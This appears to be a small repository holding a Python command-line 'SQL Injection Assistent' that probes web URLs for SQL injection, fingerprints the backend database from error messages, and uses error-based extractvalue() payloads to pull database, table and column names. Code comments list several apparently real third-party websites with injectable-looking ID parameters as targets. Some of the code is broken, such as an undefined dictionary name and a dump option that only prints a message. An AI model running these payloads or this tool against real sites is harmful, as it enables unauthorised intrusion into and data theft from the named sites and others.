├── README.md └── sql.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /sql.py: -------------------------------------------------------------------------------- 1 | import requests, argparse 2 | from bs4 import BeautifulSoup as BS 3 | 4 | # http://www.securityidiots.com/Web-Pentest/SQL-Injection/XPATH-Error-Based-Injection-Extractvalue.html 5 | # https://www.architecturalpapers.ch/index.php?ID=4%27 6 | # http://www.wurm.info/index.php?id=8%27 7 | # https://www.cityimmo.ch/reservations.php?lang=FR&todo=res&;id=22 8 | # http://www.meggieschneider.com/php/detail.php?id=48 9 | 10 | def Main(test, get_database_type, dbname, tablenames, dump, columns, colum_name): 11 | if args.test: 12 | urls = [args.test + "'", args.test + '"', args.test[:-4] + ';', args.test + ")", args.test + "')", args.test + '")', args.test + '*'] 13 | vulnerable_text = ['MySQL Query fail:', '/www/htdocs/', 'Query failed', 'mysqli_fetch_array()', 'mysqli_result', 'Warning: ', 'MySQL server', 'SQL syntax', 'You have an error in your SQL syntax;', 'mssql_query()', "Incorrect syntax near '='", 'mssql_num_rows()', 'Notice: '] 14 | try: 15 | for url in urls: 16 | results = requests.get(url) 17 | data = results.text 18 | soup = BS(data, features='html.parser') 19 | for vuln in vulnerable_text: 20 | if vuln in data: 21 | string = vuln 22 | vulnerable = True 23 | if vulnerable: 24 | print('Site is vulnerable!') 25 | except: 26 | print('Site is not vulnerable!') 27 | elif args.dump: 28 | print('Dumping the database') 29 | elif args.tablenames: 30 | print("Extracting tables names...") 31 | link = str(args.tablenames) + " and extractvalue(1,(select%20group_concat(table_name) from%20information_schema.tables where table_schema=database()))" 32 | results = requests.get(link) 33 | data = results.text 34 | str_num = str(data).find('error: ') 35 | str1_num = data[str_num:] 36 | str1 = str1_num[8:] 37 | str2 = str1.find('\'') 38 | str3 = str1[:str2] 39 | print(f"\nTable names: {str3}") 40 | elif args.columns: 41 | print('Extracting Columns...') 42 | link = str(args.columns) + " and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='" + args.colum_name + "'limit 0,1)))--" 43 | results = requests.get(link) 44 | data = results.text 45 | 46 | print(f"Column names: {data}") 47 | elif args.dbname: 48 | link = args.dbname + " and extractvalue(1,concat(1,(select database()))) --" # " and extractvalue(0x0a,concat(0x0a,(select database())))--" 49 | print(link) 50 | results = requests.get(link) 51 | data = results.text 52 | str_num = str(data).find('error:') 53 | print(str_num) 54 | str1_num = data[str_num:] 55 | str1 = str1_num[8:] 56 | str2 = str1.find('\'') 57 | str3 = str1[:str2] 58 | if str_num == -1: 59 | print('Access Denied') 60 | else: 61 | print(f"Database name: {str3}") 62 | elif args.get_database_type: 63 | urls = [args.get_database_type + "'", args.get_database_type + '"', args.get_database_type[:-4] + ';', args.get_database_type + ")", args.get_database_type + "')", args.get_database_type + '")', args.get_database_type + '*'] 64 | db_dict = { 65 | "MySQL": [ 66 | 'MySQL', 'MySQL Query fail:', 'SQL syntax', 'You have an error in your SQL syntax', 'mssql_query()', 'mssql_num_rows()', 67 | '1064 You have an error in your SQL syntax' 68 | ], 69 | "PostGre": [ 70 | 'PostgreSQL query failed', 'Query failed', 'syntax error', 'unterminated quoted string', 'unterminated dollar-quoted string', 71 | 'column not found', 'relation not found', 'function not found' 72 | ], 73 | "Microsoft_SQL": [ 74 | 'Microsoft SQL Server', 'Invalid object name', 'Unclosed quotation mark', 'Incorrect syntax near', 'SQL Server error', 75 | 'The data types ntext and nvarchar are incompatible' 76 | ], 77 | "Oracle": [ 78 | 'ORA-', 'Oracle error', 'PLS-', 'invalid identifier', 'missing expression', 'missing keyword', 'missing right parenthesis', 79 | 'not a valid month' 80 | ], 81 | "Advantage_Database": [ 82 | 'AdsCommandException', 'AdsConnectionException', 'AdsException', 'AdsExtendedReader', 'AdsDataReader', 'AdsError' 83 | ], 84 | "Firebird": [ 85 | 'Dynamic SQL Error', 'SQL error code', 'arithmetic exception', 'numeric value is out of range', 'malformed string', 86 | 'Invalid token' 87 | ] 88 | } 89 | DBFound = 0 90 | DBType = '' 91 | try: 92 | for url in urls: 93 | results = requests.get(url) 94 | data = results.text 95 | soup = BS(data, features='html.parser') 96 | while not DBFound: 97 | for db, identifiers in DBDict.items(): 98 | for dbid in identifiers: 99 | if dbid in data: 100 | DBType = db 101 | DBFound = 1 102 | print(DBType) 103 | break 104 | except: 105 | print('Database type: Unknown') 106 | else: 107 | print('Invalid Argument given!') 108 | 109 | if __name__ == '__main__': 110 | parser = argparse.ArgumentParser(description='SQL Injection Assistent') 111 | ap = argparse.ArgumentParser(prog='sql.py', usage='%(prog)s [options] -t ', description='SQL Injection Assistent') 112 | ap.add_argument('-t', '--test', type=str, help='Test Target for SQLI Vulnerablities') 113 | ap.add_argument('-gdt', '--get_database_type', type=str, help='Find backend DB type') 114 | ap.add_argument('-dbn', '--dbname', type=str, help='Get database name') 115 | ap.add_argument('-tn', '--tablenames', type=str, help='Get table names') 116 | ap.add_argument('-c', '--columns', type=str, help="Get Column names") 117 | ap.add_argument('-cn', '--colum_name', type=str, help='Column Name') 118 | ap.add_argument('-d', '--dump', type=str, help="Dump the Database") 119 | args = ap.parse_args() 120 | test = args.test 121 | dbname = args.dbname 122 | tablenames = args.tablenames 123 | dump = args.dump 124 | columns = args.columns 125 | colum_name = args.colum_name 126 | get_database_type = args.get_database_type 127 | Main(test, get_database_type, dbname, tablenames, dump, columns, colum_name) 128 | --------------------------------------------------------------------------------